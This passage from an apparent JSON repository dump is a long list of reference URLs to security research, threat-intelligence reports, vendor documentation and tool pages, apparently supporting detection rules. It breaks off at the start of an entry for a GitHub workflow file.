https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/dnscmd\n- https://darkatlas.io/blog/medusa-ransomware-group-opsec-failure\n- https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\n- https://github.com/CheraghiMilad/bypass-Neo23x0-auditd-config/blob/f1c478a37911a5447d5ffcd580f22b167bf3df14/sysinfo-syscall/README.md\n- https://web.archive.org/web/20230929023836/http://powershellhelp.space/commands/set-netfirewallrule-psv5.php\n- https://www.virustotal.com/gui/file/14e722855605ba78dc1d21153f0e1be90e7528149f2cd2d7d6eba8ef27534bdc/behavior\n- https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211\n- https://github.com/TwoSevenOneT/WSASS\n- https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/\n- https://github.com/JohnHammond/recaptcha-phish\n- https://labs.nettitude.com/blog/introducing-sharpwsus/\n- http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/\n- https://redcanary.com/blog/threat-intelligence/msix-installers/\n- https://gtfobins.github.io/gtfobins/gawk/#shell\n- https://research.splunk.com/endpoint/76406a0f-f5e0-4167-8e1f-337fdc0f1b0c/\n- https://man7.org/linux/man-pages/man2/syslog.2.html\n- https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/\n- https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/\n- https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\n- https://www.cyberciti.biz/faq/show-all-running-processes-in-linux/\n- https://app.any.run/tasks/9a8fd563-4c54-4d0a-9ad8-1fe08339cbc3/\n- https://reliaquest.com/blog/threat-spotlight-inside-flax-typhoons-arcgis-compromise/\n- https://redcanary.com/blog/threat-detection/process-masquerading/\n- https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/\n- https://www.trendmicro.com/en_us/research/25/i/an-mdr-analysis-of-the-amos-stealer-campaign.html\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo\n- https://any.run/report/6eea2773c1b4b5c6fb7c142933e220c96f9a4ec89055bf0cf54accdcde7df535/a407f006-ee45-420d-b576-f259094df091\n- https://github.com/msanft/CVE-2025-55182\n- https://www.esentire.com/security-advisories/netsupport-rat-clickfix-distribution\n- https://learn.microsoft.com/en-us/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide\n- https://github.com/h4rmy/KDU\n- https://learn.microsoft.com/en-us/dotnet/api/system.diagnostics.eventlog.clear\n- https://medium.com/@poudelswachchhanda123/preventing-lnk-and-fakecaptcha-threats-a-system-hardening-approach-2f7b7ed2e493\n- https://securelist.com/notepad-supply-chain-attack/118708/\n- https://learn.microsoft.com/en-us/troubleshoot/windows-client/installing-updates-features-roles/system-registry-no-backed-up-regback-folder\n- https://www.bleepingcomputer.com/news/security/centrestack-rce-exploited-as-zero-day-to-breach-file-sharing-servers/\n- https://asec.ahnlab.com/en/40263/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4673\n- https://rapid7.com/blog/post/2019/02/19/stack-based-buffer-overflow-attacks-what-you-need-to-know/\n- https://www.ired.team/offensive-security/lateral-movement/winrs-for-lateral-movement\n- https://github.com/rtecCyberSec/BitlockMove\n- https://github.com/nasbench/Misc-Research/blob/fc46f6da34ff7e0076da28fd3e66d6e1100f1c2f/ETW/Microsoft-Windows-SMBClient.md\n- https://www.microsoft.com/en-us/security/blog/2025/04/15/threat-actors-misuse-node-js-to-deliver-malware-and-other-malicious-payloads/\n- https://thedfirreport.com/2025/09/08/blurring-the-lines-intrusion-shows-connection-with-three-major-ransomware-gangs/\n- https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\n- https://reliaquest.com/blog/threat-spotlight-reliaquest-uncovers-vulnerability-behind-sap-netweaver-compromise/\n- https://gist.github.com/swachchhanda000/a0228130f86a2dedfbcebb415b47f870\n- https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/\n- https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg\n- https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/\n- https://docs.stellarcyber.ai/5.2.x/Using/ML/Alert-Rule-Based-Potentially_Malicious_AWS_Activity.html\n- https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/8/html/configuring_and_managing_networking/getting-started-with-nftables_configuring-and-managing-networking\n- https://www.securityhq.com/blog/malicious-isatap-tunneling-unearthed-on-windows-server/\n- https://mrd0x.com/filefix-clickfix-alternative/\n- https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\n- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-acl?view=powershell-7.4\n- https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software\n- https://gtfobins.github.io/gtfobins/capsh/#shell\n- https://intel.thedfirreport.com/eventReports/view/70\n- http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/\n- https://securelist.com/forumtroll-apt-hacking-team-dante-spyware/117851/\n- https://www.hexacorn.com/blog/2024/01/06/1-little-known-secret-of-fondue-exe/\n- https://x.com/Max_Mal_/status/1826179497084739829\n- https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n- https://www.vaadata.com/blog/what-is-command-injection-exploitations-and-security-best-practices/\n- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-24054\n- https://detect.fyi/hunting-fileless-malware-in-the-windows-registry-1339ccde00ad\n- https://www.scip.ch/en/?labs.20240523\n- https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/\n- https://www.sentinelone.com/blog/exploiting-repos-6-ways-threat-actors-abuse-github-other-devops-platforms\n- https://web.archive.org/web/20230331181619/https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\n- https://www.scpx.com.au/2025/11/16/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\n- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/398/event\n- https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n- 
https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/\n- https://research.splunk.com/sources/5d8bd475-c8bc-4447-b27f-efa508728b90/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#bitlocker-key-retrieval\n- https://nodejs.org/api/child_process.html#class-childprocess\n- https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/\n- https://news.sophos.com/en-us/2025/08/26/velociraptor-incident-response-tool-abused-for-remote-access/\n- https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33053\n- https://www.wiz.io/blog/how-to-set-secure-defaults-on-aws\n- https://docs.aws.amazon.com/accounts/latest/reference/API_EnableRegion.html\n- https://blackpointcyber.com/blog/racing-to-exploit-centrestacks-cve-2025-30406/\n- https://learn.microsoft.com/en-us/sysinternals/downloads/microsoft-store\n- https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/\n- https://x.com/Threatlabz/status/1879956781360976155\n- https://github.com/rapid7/metasploit-framework/issues/11337\n- https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks\n- https://tria.ge/240731-jh4crsycnb/behavioral2\n- https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/set_1\n- https://github.com/Lifailon/RSA/blob/rsa/Sources/RSA-1.4.1.ps1#L1468\n- https://app.any.run/tasks/ae3c4ded-fd6a-43ed-8215-ba0ba574ad33\n- https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/\n- https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\n- https://www.hexacorn.com/blog/2020/08/23/certutil-one-more-gui-lolbin\n- https://www.cybertriage.com/artifact/terminalservices_remoteconnectionmanager_log/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\n- 
https://app.any.run/tasks/5c16b4db-4b36-4039-a0ed-9b09abff8be2\n- https://itm4n.github.io/cdpsvc-dll-hijacking/\n- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31324\n- https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\n- https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps\n- https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/\n- https://megatools.megous.com/\n- https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n- https://www.jamf.com/blog/infostealers-pose-threat-to-macos/\n- https://www.sentinelone.com/labs/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/\n- https://github.com/codewhitesec/SysmonEnte/blob/fe267690fcc799fbda15398243615a30451d9099/screens/1.png\n- https://labs.jumpsec.com/tokensmith-bypassing-intune-compliant-device-conditional-access/\n- https://learn.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code\n- https://github.com/pr0xylife/Pikabot/blob/fc58126127adf0f65e78f4eec59675523f48f086/Pikabot_22.12.2023.txt\n- https://www.safetycli.com/blog/shai-hulud-npm-attack-runs-malicious-github-action\n- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#atypical-travel\n- https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216\n- https://trustedsec.com/blog/command-line-underdog-wmic-in-action\n- https://github.com/mulwareX/CVE-2025-6218-POC\n- https://wazuh.com/blog/how-to-detect-meshagent-with-wazuh/\n- https://securitylabs.datadoghq.com/cloud-security-atlas/vulnerabilities/iam-user-without-mfa/\n- https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/\n- https://www.fortiguard.com/psirt/FG-IR-24-535\n- https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/\n- https://learn.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\n- 
https://x.com/JangPr0/status/1932034543026065833\n- https://thedfirreport.com/2024/04/01/from-onenote-to-ransomnote-an-ice-cold-intrusion/\n- https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winrs\n- https://www.group-ib.com/resources/threat-research/red-curl-2.html\n- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Privileged%20container/\n- https://www.virustotal.com/gui/file/6bb4cdbaef03b732a93559a58173e7f16b29bfb159a1065fae9185000ff23b4b\n- https://www.linkedin.com/posts/mauricefielenbach_livingofftheland-redteam-persistence-activity-7344801774182051843-TE00/\n- https://github.com/rtecCyberSec/SpeechRuntimeMove\n- https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/306021697/config-firewall-address\n- https://x.com/0x534c/status/1944694507787710685\n- https://www.loobins.io/binaries/nscurl/\n- https://gtfobins.github.io/gtfobins/gcc/#shell\n- https://docs.microsoft.com/en-us/powershell/module/appx/add-appxpackage\n- https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis\n- https://thedfirreport.com/2025/01/27/cobalt-strike-and-a-pair-of-socks-lead-to-lockbit-ransomware/\n- https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html\n- https://web.archive.org/web/20230329163438/https://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html\n- https://github.com/HackTricks-wiki/hacktricks/blob/72f20a3fa26775b932bd819f1824c6377802a768/src/windows-hardening/basic-cmd-for-pentesters.md#firewall\n- https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set\n- https://www.loobins.io/binaries/pbpaste/\n- https://news.ycombinator.com/item?id=29504755\n- 
https://awscli.amazonaws.com/v2/documentation/api/latest/reference/s3api/delete-bucket.html\n- https://www.pentestpartners.com/security-blog/living-off-the-land-gpo-style/\n- https://hopeness.medium.com/master-the-linux-mknod-command-a-comprehensive-guide-1c150a546aa8\n- https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/\n- https://juggernaut-sec.com/capabilities/#cap_setuid\n- https://securitylabs.datadoghq.com/articles/shai-hulud-2.0-npm-worm/\n- https://www.electronjs.org/docs/latest/tutorial/native-code-and-electron\n- http://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n- https://notepad-plus-plus.org/news/v889-released/\n- https://github.com/DambergC/SaveFolder/blob/90e945eba80fae85f2d54b4616e05a44ec90c500/Cygate%20Installation%20tool%206.22/Script/OSD/OSDeployment-CredentialGuardDisable.ps1#L50\n- https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/\n- https://cert.gov.ua/article/6284080\n- https://www.splunk.com/en_us/blog/security/threat-update-awfulshred-script-wiper.html\n- https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n- https://unit42.paloaltonetworks.com/microsoft-sharepoint-cve-2025-49704-cve-2025-49706-cve-2025-53770/\n- https://www.zscaler.com/blogs/security-research/deepseek-lure-using-captchas-spread-malware\n- https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/\n- https://www.security.com/threat-intelligence/medusa-ransomware-attacks\n- https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/\n- https://www.welivesecurity.com/en/eset-research/update-winrar-tools-now-romcom-and-others-exploiting-zero-day-vulnerability/\n- https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n- https://thecyberexpress.com/rogue-rdp-files-used-in-ukraine-cyberattacks/\n- 
https://cloud.google.com/blog/topics/threat-intelligence/unc3944-targets-saas-applications\n- https://www.virustotal.com/gui/file/29837d0d3202758063185828c8f8d9e0b7b42b365c8941cc926d2d7c7bae2fb3\n- https://manual.cs50.io/2/personality\n- https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures\n- https://en.wikipedia.org/wiki/Right-to-left_override\n- https://www.attackiq.com/2023/09/20/emulating-rhysida/\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-5038\n- https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging\n- https://learn.microsoft.com/en-us/entra/id-protection/howto-identity-protection-configure-mfa-policy\n- https://dear-territory-023.notion.site/WebDav-Share-Testing-e4950fa0c00149c3aa430d779b9b1d0f?pvs=4\n- https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/\n- https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/windows-defender-application-control/operations/event-id-explanations\n- https://github.com/fortra/impacket/blob/ff8c200fd040b04d3b5ff05449646737f836235d/examples/secretsdump.py\n- https://www.virustotal.com/gui/file/54d60fd58d7fa3475fa123985bfc1594df26da25c1f5fbc7dfdba15876dd8ac5/behavior\n- https://github.com/logangoins/Krueger/tree/main\n- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08064518/Carbanak_APT_eng.pdf\n- https://docs.github.com/en/authentication/keeping-your-account-and-data-secure/security-log-events\n- https://www.geeksforgeeks.org/how-to-kill-processes-on-the-linux-desktop-with-xkill/\n- https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-guardduty-detector-is-enabled\n- https://github.com/varwara/CVE-2024-35250\n- 
https://linux.die.net/man/8/auditct\n- https://www.broadcom.com/support/security-center/protection-bulletin/funksec-ransomware\n- https://www.nccgroup.com/us/research-blog/lapsus-recent-techniques-tactics-and-procedures/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#appid-uri-added-modified-or-removed\n- https://f5-sdk.readthedocs.io/en/latest/apidoc/f5.bigip.tm.util.html#module-f5.bigip.tm.util.bash\n- https://portswigger.net/daily-swig/vmware-horizon-under-attack-as-china-based-ransomware-group-targets-log4j-vulnerability\n- https://bazaar.abuse.ch/browse/tag/one/\n- https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/\n- https://web.archive.org/web/20200530031906/https://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/\n- https://www.nextron-systems.com/2025/07/29/detecting-the-most-popular-mitre-persistence-method-registry-run-keys-startup-folder/\n- https://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm\n- https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/\n- https://docs.microsoft.com/en-us/powershell/module/powershellwebaccess/install-pswawebapplication\n- https://github.com/search?q=devcon+disable+VMWVMCIHOSTDEV\n- https://www.picussecurity.com/resource/blog/as-rep-roasting-attack-explained-mitre-attack-t1558.004\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\n- https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4732\n- https://learn.microsoft.com/en-us/windows-hardware/manufacture/desktop/reagentc-command-line-options?view=windows-11\n- https://jgspiers.com/audit-group-policy-changes/\n- 
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/24/b/lockbit-attempts-to-stay-afloat-with-a-new-version/technical-appendix-lockbit-ng-dev-analysis.pdf\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/114404382/config-vpn-ssl-settings\n- https://github.com/arttoolkit/arttoolkit.github.io/blob/16d6230d009e58fd6f773f5317fd4d14c1f26004/_wadcoms/AMSI-Bypass-Jscript_amsienable.md\n- https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/\n- https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/\n- https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/\n- https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior\n- https://github.com/redcanaryco/atomic-red-team/blob/75fa21076dcefa348a7521403cdd6bfc4e88623c/atomics/T1124/T1124.md\n- https://x.com/0gtweet/status/1564131230941122561\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741\n- https://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins\n- https://github.com/TwoSevenOneT/WSASS/blob/2c8fd9fa32143e7bc9f066e9511c6f8a57bc64b5/WSASS.cpp#L251\n- https://www.man7.org/linux/man-pages/man1/systemctl.1.html\n- https://gtfobins.github.io/gtfobins/rsync/#shell\n- https://www.trendmicro.com/en_us/research/25/f/water-curse.html\n- https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpwritedump\n- https://www.youtube.com/watch?v=uSYvHUVU8xY\n- https://www.splunk.com/en_us/blog/security/you-bet-your-lsass-hunting-lsass-access.html\n- https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616\n- https://man7.org/linux/man-pages/man1/dmesg.1.html\n- 
https://www.nextron-systems.com/2024/03/22/unveiling-kamikakabot-malware-analysis/\n- https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf\n- https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf\n- https://www.trellix.com/blogs/research/the-silent-fileless-threat-of-vshell/\n- https://docs.github.com/en/pages/getting-started-with-github-pages/creating-a-github-pages-site\n- https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/\n- https://apophis133.medium.com/powershell-script-tactical-rmm-installation-45afb639eff3\n- https://bazaar.abuse.ch/sample/7bde840c7e8c36dce4c3bac937bcf39f36a6f118001b406bfbbc25451ce44fb4/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts#assignment-and-elevation\n- https://www.mdsec.co.uk/2019/02/macros-and-more-with-sharpshooter-v2-0/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-credentials\n- https://www.microsoft.com/en-us/security/blog/2025/07/22/disrupting-active-exploitation-of-on-premises-sharepoint-vulnerabilities/\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-infrastructure\n- https://docs.github.com/en/enterprise-cloud@latest/code-security/secret-scanning/push-protection-for-repositories-and-organizations\n- https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity\n- https://hawktrace.com/blog/CVE-2025-59287-UNAUTH\n- https://docs.python.org/3/library/http.server.html\n- https://docs.fortinet.com/document/fortigate/7.6.4/fortios-log-message-reference/44547/44547-logid-event-config-objattr\n- https://ptsecurity.com/research/pt-esc-threat-intelligence/striking-panda-attacks-apt31-today\n- https://firecompass.com/crushftp-vulnerability-cve-2025-54309-securing-file-transfer-services/\n- 
https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist\n- https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#new-country\n- http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/\n- https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/\n- https://expel.com/blog/cache-smuggling-when-a-picture-isnt-a-thousand-words/\n- https://restic.net/\n- https://woshub.com/disable-credential-guard-windows/\n- https://labs.yarix.com/2025/06/doppelganger-an-advanced-lsass-dumper-with-process-cloning/\n- https://www.virustotal.com/gui/file/d2a4f52a9923336f119a52e531bbb1e66f18322fd8efa9af1a64b94f4d36dc97\n- https://tria.ge/241231-j9yatstqbm/behavioral1\n- https://learn.microsoft.com/en-us/windows/package-manager/winget/install#local-install\n- https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/microsoft-windows-terminalservices-rdp-winstationextensions-securitylayer\n- https://www.trendmicro.com/en_us/research/25/i/unmasking-the-gentlemen-ransomware.html\n- https://cloud.google.com/blog/topics/threat-intelligence/apt41-initiates-global-intrusion-campaign-using-multiple-exploits/\n- https://awscli.amazonaws.com/v2/documentation/api/latest/reference/ec2/delete-flow-logs.html\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/takeown\n- https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/start\n- https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019\n- https://www.unicode.org/versions/Unicode5.2.0/ch02.pdf\n- https://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/\n- https://cert.gov.ua/article/6277849\n- https://learn.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=net-8.0\n- 
https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect\n- https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Amazon%20Web%20Services/Analytic%20Rules/AWS_GuardDutyDisabled.yaml\n- https://research.splunk.com/endpoint/395ed5fe-ad13-4366-9405-a228427bdd91/\n- https://help.fortinet.com/fsiem/Public_Resource_Access/7_4_0/rules/PH_RULE_AWS_GuardDuty_Detector_Deletion.htm\n- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1\n- https://www.howtogeek.com/137270/50-file-extensions-that-are-potentially-dangerous-on-windows\n- https://www.hexacorn.com/blog/2018/04/27/i-shot-the-sigverif-exe-the-gui-based-lolbin/\n- https://www.getsafety.com/blog-posts/shai-hulud-npm-attack\n- https://gist.github.com/travisbgreen/82b68bac499edbe0b17dcbfa0c5c71b7\n- https://stackoverflow.com/questions/66011412/how-to-clear-a-event-log-in-powershell-7\n- https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html\n- https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100\n- https://www.pcrisk.com/removal-guides/31853-funklocker-funksec-ransomware\n- https://www.joesandbox.com/analysis/1467354/0/html\n- https://help.fortinet.com/fsiem/Public_Resource_Access/7_2_1/rules/PH_RULE_AWS_Management_Console_Brute_Force_of_Root_User_Identity.htm\n- https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently\n- https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n- https://developer.broadcom.com/xapis/esxcli-command-reference/7.0.0/namespace/esxcli_system.html\n- 
https://github.com/bobby-tablez/TTP-Threat-Feeds/blob/45398914e631f8372c3a9fbcd339ff65ffff1b17/results/2025/10/20251001-161956-trendmicro-atomic-macos-stealer-(amos).yml#L44\n- https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous\n- https://us-cert.cisa.gov/ncas/alerts/aa21-259a\n- https://research.splunk.com/endpoint/3742ebfe-64c2-11eb-ae93-0242ac130002\n- https://redcanary.com/threat-detection-report/techniques/installer-packages/\n- https://docs.fortinet.com/document/fortigate/7.6.4/cli-reference/113121765/config-vpn-ssl-web-portal\n- https://learn.microsoft.com/en-us/sql/t-sql/statements/drop-table-transact-sql?view=sql-server-ver16\n- https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-granted-highly-privileged-permissions\n- https://blog.sekoia.io/scattered-spider-laying-new-eggs/\n- https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection\n- https://www.binarly.io/blog/design-issues-of-modern-edrs-bypassing-etw-based-solutions\n- https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48\n- https://labs.watchtowr.com/expression-payloads-meet-mayhem-cve-2025-4427-and-cve-2025-4428/?123\n- https://github.com/EvotecIT/TheDashboard/blob/481a9ce8f82f2fd55fe65220ee6486bae6df0c9d/Examples/RunReports/PingCastle.ps1\n- https://www.hexacorn.com/blog/2023/12/26/1-little-known-secret-of-runonce-exe-32-bit/\n- https://man7.org/linux/man-pages/man8/setcap.8.html\n- https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/List%20K8S%20secrets/\n- http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/\n- https://sysdig.com/blog/detecting-and-mitigating-cve-2024-12084-rsync-remote-code-execution/\n- 
https://docs.github.com/en/repositories/creating-and-managing-repositories/transferring-a-repository\n- https://catalyst.prodaft.com/public/report/inside-the-latest-espionage-campaign-of-nebulous-mantis\n- https://docs.github.com/en/enterprise-cloud@latest/admin/monitoring-activity-in-your-enterprise/reviewing-audit-logs-for-your-enterprise/audit-log-events-for-your-enterprise#migration\n- https://web.archive.org/web/20200601000524/https://cyberx-labs.com/blog/gangnam-industrial-style-apt-campaign-targets-korean-industrial-companies/\n- https://web.archive.org/web/20170909091934/https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis\n- https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample\n- https://viz.greynoise.io/tags/hello-world-scraper-botnet?days=30\n- https://adsecurity.org/?p=1785\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/deployment/deploy-appcontrol-policies-using-group-policy\n- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules\n- https://reliaquest.com/blog/threat-spotlight-cve-2025-54309-crushftp-exploit/\n- https://app.any.run/tasks/8901e2d5-0c5a-48ba-a8e9-10b5ed7e06f4\n- https://huntress.com/blog/esxi-vm-escape-exploit\n- https://unit42.paloaltonetworks.com/microsoft-cve-2025-59287/\n- https://www.dsinternals.com/en/dpapi-backup-key-theft-auditing/\n- https://docs.datadoghq.com/security/default_rules/719-39f-9cd/\n- https://support.kaspersky.com/KES4Linux/12.0.0/en-US/197929.htm\n- https://taggart-tech.com/evildeno/\n- https://medium.com/@ninnesoturan/detecting-ipv6-dns-takeover-a54a6a88be1f\n- https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7\n- https://app.any.run/tasks/ea944b89-69d8-49c8-ac1f-5c76ad300db2\n"
  },
  {
    "path": ".github/workflows/goodlog-tests.yml",
